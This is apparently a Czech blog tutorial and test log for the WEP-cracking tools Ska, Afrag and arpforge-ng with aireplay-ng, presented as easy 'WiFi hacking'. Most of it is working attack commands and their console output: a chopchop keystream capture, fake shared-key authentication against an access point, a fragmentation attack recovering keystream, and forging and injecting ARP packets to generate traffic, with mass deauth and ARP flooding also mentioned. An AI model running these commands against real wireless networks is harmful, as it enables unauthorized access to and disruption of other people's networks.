Kód afrag, MDK a Ska – Fragmentační útok

skript giga wordlist creator Ska je minimalistický skript který dokáže věci jako mass deauth nebo ARP flood v bezdrátové síti. V textu je pouze log z testování aplikací Ska, Afrag a MDK. WiFi Hacking, prolamování WEP klíče, generování trafiku nebo mass deauth pomocí těchto prográmů není nijak složité, chce se s tím ale málinko pohrát. Jsou to doplňkové skripty, né plnohodnotné programy. Aktualizováno: Opraven download link. Dik za post.

Aktualizováno: Tak je zde již i grafická (GUI) nástavba na zmiňované nástroje. Jmenuje se Charon a myslím, že se jedná o velice povedenou aplikaci. Dostupná jako lzm balíček pro operační systém Back|Track Linux (.lzm)

Ska

SKA je první kus funkčního kódu co umí falešnou autentizaci (fake authentication) v bezdrátových sítích které používají zabezpečení autentizace se sdíleným klíčem (Shared Key Authentication), odsud i název aplikace. Pro ověření klienta není potřeba znát klíč! To co stačí je keystream odchycen (chopped) pomocí aireplay-ng útoku chopchop. Kód implementován vývojářem Hirte do aircrack suity.

Ska sám o sobě stačí kompilovat a instalovat make && make install. Výpis obsahu adresáře po rozbalení aplikace:

ls

total 37
drwxr-xr-x 2 root root 128 Sep 12 18:52 ./
drwxr-xr– 4 root root 1040 Sep 12 18:16 ../
-rwxrwxrwx 1 root root 10013 Nov 12 2005 crctable.h*
-rwxr–r– 1 root root 1037 Mar 9 2006 pcap.h*
-rwxr–r– 1 root root 19323 Sep 12 18:41 ska.c*

Kompilace:

ska-0.2 # gcc -o ska ska.c

KoreK chopchop:

ska-0.2 # aireplay-ng -4 ath0

Read 94 packets…
Size: 278, FromDS: 1, ToDS: 0 (WEP)
.
BSSID = 00:60:xx:xx:xx:xx
Dest. MAC = 00:1x:xx:xx:xx:xx
Source MAC = 00:61:xx:xx:xx:xx
.
0x0000: 0842 9500 0012 f02e b934 000f b559 2916 .B…….4…Y).
0x0010: 02c1 260a 21d7 e013 0007 a400 35ea 7bbd ..&.!…….5.{.
0x0020: afd3 f61a 6b4c fa6a e7ee 079c 4e15 41f4 ….kL.j….N.A.
Use this packet ? y

Saving chosen packet in replay_src-0912-185342.cap
Offset 277 ( 0% done) | xor = BB | pt = F5 | 104 frames written in 312ms
Offset 36 (98% done) | xor = 2E | pt = 45 | 18 frames written in 54ms
Offset 35 (99% done) | xor = 1A | pt = 00 | 229 frames written in 687ms
Offset 34 (99% done) | xor = FE | pt = 08 | 147 frames written in 441ms
.
Saving plaintext in replay_dec-001-095507.cap
Saving keystream in replay_dec-0912-095507.xor
.
Completed in 104s (2.31 bytes/s)

Aplikace PRGA pomocí kódu SKA

./ska ath0 „Wireless“ 00:60:xx:xx:xx:xx 00:61:xx:xx:xx:xx replay_dec-0912-095507.xor

diskuze aireplay

Výpis konzole:

Step1: Auth
Size: 30, FromDS: 0, ToDS: 0
0x0000: b000 3a01 000f b559 2916 0000 1111 2222 ..:….Y)…..““
0x0010: 000f b559 2916 b001 0100 0100 0000 …Y)………

Step 2: Response
Size: 160, FromDS: 0, ToDS: 0
0x0000: b000 2c01 0000 1111 2222 000f b559 2916 ..,…..““…Y).
0x0090: 5dfa fe46 33c9 2ac1 f48c 3c7e 85e4 2343 ]..F3.*…<~..#C
0x00a0: 8fd9 7c2f f462 d5f1 ..|/.b..

Step 4: Answer packet:
Size: 30, FromDS: 0, ToDS: 0
0x0000: b000 2c01 0000 1111 2222 000f b559 2916 ..,…..““…Y).
0x0010: 000f b559 2916 e080 0100 0400 0000 …Y)………
.
Code 0 – Authentication SUCCESSFUL after trying 1 times to authenticate :)
.
Capability Field from Beacon Frame:
Size: 2, FromDS: 0, ToDS: 0
0x0000: 1500 ..

Step 5: Sending association request:
Size: 56, FromDS: 0, ToDS: 0
0x0000: 0000 3a01 000f b559 2916 0000 1111 2222 ..:….Y)…..““
0x0010: 000f b559 2916 d001 1500 0a00 000a 626c …Y)………bl
0x0020: 3333 6420 3133 3337 0104 0204 0b16 3208 33d 1337……2.
0x0030: 0c12 1824 3048 606c …$0H`l

Step 6: Association Response:
Size: 36, FromDS: 0, ToDS: 0
0x0000: 1000 2c01 0000 1111 2222 000f b559 2916 ..,…..““…Y).
0x0010: 000f b559 2916 0081 1500 0000 02c0 0104 …Y)………..
0x0020: 8284 8b96 ….
.
Code 0 – Association SUCCESSFUL after trying 1 times to authenticate and 1 times to associate:)
.
real 0m0.196s
user 0m0.000s
sys 0m0.008s

Afrag

Afrag je první implementace fragmentačního útoku na platformě Linux. Tento útok vyžaduje speciálni ovládač a kartu, která je schopna „správně uchopit“ IEEE802.11 fragmentaci. Výstupem z nástroje je soubor v aircrack-ng keystream formátu (.xor). Výstup lze použít stejným způsobem jako výstup z chopchop útoku v aireplay-ng. S keystreamem je možno vytvořit ARP paket (arpforge-ng nebo v starší verzi 0.6.2 to byl packetforge-ng). Paket pak lze injektovat do cílového wifi systému, generujíce buďto dotaz a/nebo odpovědi, generujíc počet inicializačních vektorů. Pro příklad útoku se podívejte do README v tarballu. Stejně jako SKA i afrag již byl integrován jako jeden z útoků aireplay-ng, dobrá nápad je používat aircrack-ng SVN verze pro nejnovější fragmentační kód útoku.

Kompilace:
afrag-0.1 # gcc -o afrag afrag.c
afrag.c:888:2: warning: no newline at end of file

Aktivace zařízení a start monito módu

ifconfig rausb0 up
iwconfig rausb0 rate 1M channel 1 mode monitor

Výpis (log) po startu aplikace
./afrag rausb0 00:60:xx:xx:xx:xx 00:61:xx:xx:xx:xx FF:FF:FF:FF:FF:FF 10.10.1.20 10.10.1.20 test.xor

Waiting for a data packet…
Data packet found!
Keystream (recovered 7 bytes):
Size: 7, FromDS: 1, ToDS: 0
0x0000: 301e 313a 401e b5 0.1:@..
Sending fragmented packet
Packet:
Size: 60, FromDS: 0, ToDS: 1 (WEP)
0x0000: 0841 9500 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 0000 aaaa 0300 0000 0806 …………….
0x0020: 0001 0800 0604 0001 0012 f02e b934 c0a8 ………….4..
0x0030: 0117 0000 0000 0000 c0a8 0118 …………
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
Packet:
Size: 63, FromDS: 0, ToDS: 1 (WEP)
0x0000: 0841 9500 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 0000 0000 0000 0000 0000 …………….
0x0020: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
0x0030: 0000 0000 0000 0000 0000 0000 0000 00 ……………
No answer, repeating…
Sending fragmented packet
Packet:
Size: 60, FromDS: 0, ToDS: 1 (WEP)
0x0000: 0841 9500 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 0000 aaaa 0300 0000 0806 …………….
0x0020: 0001 0800 0604 0001 0012 f02e b934 c0a8 ………….4..
0x0030: 0117 0000 0000 0000 c0a8 0118 …………
Got RELAYED packet!!
Data packet sniffed:
Size: 71, FromDS: 1, ToDS: 0 (WEP)
0x0000: 0842 9500 ffff ffff ffff 000f b559 2916 .B………..Y).
0x0010: 0012 f02e b934 2009 0000 1800 df12 1f0f …..4 ………
0x0020: b4b1 a561 1e67 4879 cbdc 8668 87b6 43ee …a.gHy…h..C.
0x0030: 22da 739f fd26 8450 21fc bda8 d90c 84b6 „.s..&.P!…….
0x0040: a55f bb1c 4ff7 e8 ._..O..
Thats our LLC Null packet!
Resulting keystream:
Size: 36, FromDS: 1, ToDS: 0
0x0000: df12 1f0f b4b1 a561 1e67 4879 cbdc 8668 …….a.gHy…h
0x0010: 87b6 43ee 22da 739f fd26 8450 21fc bda8 ..C.“.s..&.P!…
0x0020: d90c 84b6 ….
Trying to get 408 bytes of a keystream
Packet:
Size: 408, FromDS: 0, ToDS: 1 (WEP)
0x0000: 0841 9500 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 0000 aaaa 0300 0000 0806 …………….
0x0020: 0001 0800 0604 0001 0012 f02e b934 c0a8 ………….4..
0x0030: 0117 0000 0000 0000 c0a8 0118 0000 0000 …………….
0x0090: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
0x00d0: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
— CUT —
No answer, repeating…
Trying a LLC NULL packet
Packet:
Size: 440, FromDS: 0, ToDS: 1 (WEP)
0x0000: 0841 9500 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 0000 0000 0000 0000 0000 …………….
0x00b0: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
0x00d0: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
— CUT —
Got RELAYED packet!!
Thats our LLC Null packet!
Resulting keystream:
Size: 432, FromDS: 0, ToDS: 1
0x0000: 24d5 bb04 db54 0679 ce1c 4cc9 e25f ea99 $….T.y..L.._..
0x00c0: fe22 6a20 6374 93d8 0886 5f29 6373 3ca5 .“j ct…._)cs<.
0x00d0: 0a9c 2e08 e9fe d31c e467 ce93 6535 6346 ………g..e5cF
— CUT —
Now you can build a packet with packetforge-ng out of that keystream

Pouziti Arpforge-ng:

afrag-0.1 # arpforge-ng

Arpforge-ng 0.6 – (C) 2006 Thomas d’Otreppe
Original work: Christophe Devine
http://aircrack-ng.org
usage: arpforge-ng
arpforge-ng test.xor 1 00:60:xx:xx:xx:xx 00:61:xx:xx:xx:xx 10.1.10.23 10.1.10.24 test.cap

aireplay-ng -2 rausb0 -r test.cap

Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:0F:B5:59:29:16
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:12:F0:2E:B9:34
.
0x0000: 0841 0201 000f b559 2916 0012 f02e b934 .A…..Y)……4
0x0010: ffff ffff ffff 8001 0000 2100 8e7f b804 ……….!….
0x0020: db54 0e7f ce1d 44c9 e45b ea98 9cf1 cf89 .T…D..[……
0x0030: bc2d ad16 c676 fbb1 a9cf 741a ab0a 3d5a .-…v….t…=Z
0x0040: bab3 161e ….
.
Use this packet ? y

Saving chosen packet in replay_src-0929-032919.cap You should also start airodump-ng to capture replies.

Fregmentace na elhacker.net, další materiál najdete v části download. Mimo jiné aplikace Ska MDK Afrag, frag attack video, knihu. Stránky projektu.

Kam dál?